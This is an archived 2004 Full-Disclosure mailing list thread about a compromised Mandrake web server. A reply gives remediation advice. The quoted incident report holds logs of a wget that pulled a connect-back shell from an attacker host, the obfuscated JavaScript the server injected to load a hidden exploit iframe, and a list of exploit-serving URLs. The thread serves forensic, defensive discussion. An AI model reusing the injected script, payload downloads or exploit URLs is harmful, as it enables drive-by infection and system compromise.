lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
From: dufresne at winternet.com (Ron DuFresne)
Subject: xpire.info & splitinfinity.info - exploits in
 the wild


as pertains to compromised systems, the besty advice, unless you are doing
forensics to get a handle upon how the system was compromised or seeking
legal damages, is to just plain reinstall and make sure the system is
patched and properly firewalled prior to reconnecting it to the internet.
anything less then a reinstall is likely to permit  the attacker to regain
entry to the system.  Two points to mention, mysql should not be available
to the public, it should be firewalled off from public consumption, if it
can;'t be outright killed and uninstalled.  php, is a problematic
scripting language, and requires someone with intense focus upon security
to lockdown.  Never use the vast majority of php packages publically
available, we see 5-10 of them weekly suffering from security issues, some
popping up on a weekly or bi-weekly schedule.

3rd point, in these times with scp and sftp available, ftpd should be
turned off, uninstalled and access only granted via scp/sftp for file
transfers to a server.

Thanks,

Ron DuFresne


On Sun, 24 Oct 2004, Elia Florio wrote:

> Hi list,
> i'm doing some analysis on a Linux-Mandrake 9.0 web server
> of a person that was compromised in October.
> In this host now it's installed a special trojan that insert a
> malicious <IFRAME> tag into every served .PHP page.
>
> The host is running these services :
>
> Porta 21: 220 ProFTPD 1.2.5 Server (XXXXXXX FTP Server) [server]
> Porta 22: SSH-1.99-OpenSSH_3.4p1
> Porta 25: 220 XXXXX ESMTP 5.5.1
> Porta 110: +OK <XXXX@...XXX>
> Porta 3306: MySQL 3.23.52
> Porte 80/443: Server: Apache-AdvancedExtranetServer/1.3.26 (Mandrake
> Linux/6mdk)
> sxnet/1.2.4 mod_ssl/2.8.10 OpenSSL/0.9.6g PHP/4.2.3
>
> I've found inside Apache log that the hacker break-in inside the machine
> using an overflow and injecting an executable /tmp/a.out via "qmail-inject".
> These are the suspicious log lines :
>
> [Sun Oct  3 03:35:10 2004] [notice] child pid 16012 exit signal Segmentation
> fault (11)
> [Sun Oct  3 04:08:34 2004] [notice] child pid 1272 exit signal Segmentation
> fault (11)
> [Sun Oct  3 07:18:27 2004] [notice] child pid 4397 exit signal Segmentation
> fault (11)
> [Mon Oct  4 02:27:55 2004] [notice] child pid 1203 exit signal Segmentation
> fault (11)
> qmail-inject: fatal: unable to parse this line:From: I.T.I.S. S. CANNIZZARO"
> <angdimar@...oo.it>
> [Mon Oct  4 18:43:02 2004] [notice] child pid 4248 exit signal Segmentation
> fault (11)
> [Mon Oct  4 22:58:50 2004] [notice] child pid 1190 exit signal Segmentation
> fault (11)
> [Tue Oct  5 11:58:13 2004] [notice] child pid 15689 exit signal Segmentation
> fault (11)
> qmail-inject: fatal: unable to parse this line:
> To: Drugo:Lebowski@...ero.it
> sh: -c: option requires an argument
> --15:50:07--  http://xpire.info/cli.gz
>            => `/tmp/a.out'
> Resolving xpire.info... fatto.
> Connecting to xpire.info[221.139.50.11]:80... connected.HTTP richiesta
> inviata, aspetto la risposta... 200 OK
> Lunghezza: 19,147 [text/plain]
>
>     0K .......... ........                                   100% 9.97K
>
> 15:50:13 (9.97 KB/s) - `/tmp/a.out' salvato [19147/19147]
>
> [Fri Oct  8 20:26:52 2004] [notice] child pid 9647 exit signal Segmentation
> fault (11)
> [Sat Oct  9 01:09:51 2004] [notice] child pid 3840 exit signal Segmentation
> fault (11)
>
>
> Tryin a WGET of http://xpire.info/cli.gz , I get an ELF executable for
> Linux,
> possible containing a ConnectBack shell. Inside this ELF file you can grep
> these strings:
>
> Usage:  %s host port
>  pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx /dev/pty /dev/tty sh -i Can't
> fork pty, bye!
>  Fuck you so
>  /bin/sh No connect
>  Looking up %s... Failed!
>  OK
>  %u Connect Back
>
> I don't know if the hacker installs in this machine a rootkit, but the check
> of md5sum of
> ls, lsof, ps, netstat binaries with other ones from a clean Mandrake distr.
> was good.......
>
> The main problem is finding how the Apache Server (or PHP) was altered by
> the hacker,
> because every user that connects to this host now, could be infected by
> several HTML/IE recent exploits.
> Sniffing an HTTP packet from this host, I've found that *SOMETIMES* (in a
> random way??)
> web server inserts a special javascript between HTTP-Header and served page.
> The script is :
>
> <script language=javascript>
> eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,1
> 01,40,34,60,105,102,114,97,109,101,32,115,114,99,61,39,104,116,116,112,58,47
> ,47,119,119,119,46,115,112,108,105,116,105,110,102,105,110,105,116,121,46,10
> 5,110,102,111,47,102,97,47,63,100,61,103,101,116,39,32,104,101,105,103,104,1
> 16,61,49,32,119,105,100,116,104,61,49,62,60,47,105,102,114,97,109,101,62,34,
> 41))
> </script>
>
> Decoding it, I see that it writes inside the page an <IFRAME> tag pointing
> to this url :
>
> <iframe src='http://www.splitinfinity.info/fa/?d=get' height=1
> width=1></iframe>
>
> If you surf to this page (don't do this if you use IE or are not patched)
> you could got infected
> by several exploits, cause it opens a lot a <iframe> pointing out to
> different domains.
>
> I would to list here these domains, cause they are a sources
> for exploit studying :
>
> Domain: www.sp2fucked.biz
> http://69.50.168.147/user28/counter.htm
>
> Found MHTMLRedir.Exploit
> http://213.159.117.133/dl/adv121.php
>
> http://195.178.160.30/js.php?cust=28
>
> http://195.178.160.30/ifr.php?cust=89
>
> http://69.50.168.147/user28/exploit.htm
>
> Found Java class exploit
> http://69.50.168.147/user28/exploit2.htm
>
> My questions are :
>
> 1) how can I remove this injected Javascript/IFRAME ? I've checked
> httpd.conf and a lot of PHP pages,
> but I don't found anything.....Is it possible that the hacker install some
> compromised Apache module ..so???
>
> 2) anyone knows before these sites (xpire.info or splitinfinity.info)?
> why they are still online and are serving trojan/exploit on surfer browser?
> xpire.info is related to "Mike Fox".....but it sounds as a fake Jonh Doe
> registration!
>
>       Domain ID:  D5946452-LRMS
>       Domain Name:  XPIRE.INFO
>       Created On:  23-May-2004 19:41:15 UTC
>       Last Updated On:  02-Aug-2004 08:07:20 UTC
>       Expiration Date:  23-May-2005 19:41:15 UTC
>       Sponsoring Registrar:  Direct Information Pvt Ltd. d/b/a Directi.com
> (R159-LRMS)
>       Status:  ACTIVE
>       Status:  OK
>       Registrant ID:  C4752858-LRMS
>       Registrant Name:  Mike Fox
>       Registrant Organization:  n/a
>       Registrant Street1:  Hali-gali, 77
>       Registrant City:  Deli
>       Registrant Postal Code:  12345
>       Registrant Country:  IN
>       Registrant Phone:  +91.226370256
>       Registrant Email:  c8idkvtgarwinidkvt38@...oo.com
>
>
> 3) how can I understand if a rootkit was installed???
>
> Thanks anyone for replies
>
> EF
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
	***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ